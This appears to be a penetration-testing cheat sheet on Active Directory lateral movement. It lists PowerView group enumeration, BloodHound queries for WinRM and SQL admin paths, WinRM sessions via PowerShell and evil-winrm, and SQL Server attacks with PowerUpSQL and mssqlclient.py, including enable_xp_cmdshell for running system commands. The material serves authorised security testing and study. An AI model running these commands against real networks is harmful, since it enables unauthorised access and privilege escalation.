Privileged Access
Remote Desktop
# Enumerating the Remote Desktop Users Group
Get-NetLocalGroupMember -ComputerName MS01 -GroupName "Remote Desktop Users"
WinRM
# Enumerating the Remote Management Users Group
Get-NetLocalGroupMember -ComputerName MS01 -GroupName "Remote Management Users"
# Custom query to find WinRM users
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
Establishing WinRM Session from Windows
$password = ConvertTo-SecureString "pass" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential ("DOMAIN\eren", $password)
Enter-PSSession -ComputerName DB01 -Credential $cred
ORRR
# From Linux
evil-winrm -i ip -u eren
SQL Server Admin
# check for SQL Admin Rights
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2
# hunt for SQL server instances using Powerup.ps1
# Link : <https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet>
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
# authenticate against the remote SQL server host and run custom queries or operating system commands
Get-SQLQuery -Verbose -Instance "ip,1433" -username "domain\user" -password "SQL1234!" -query 'Select @@version'
ORRR
# From Linux using mssqlclient.py
mssqlclient.py DOMAIN/USER@ip -windows-auth
enable_xp_cmdshell <-- to run system commands,escalate privs, enumerate more....
Last updated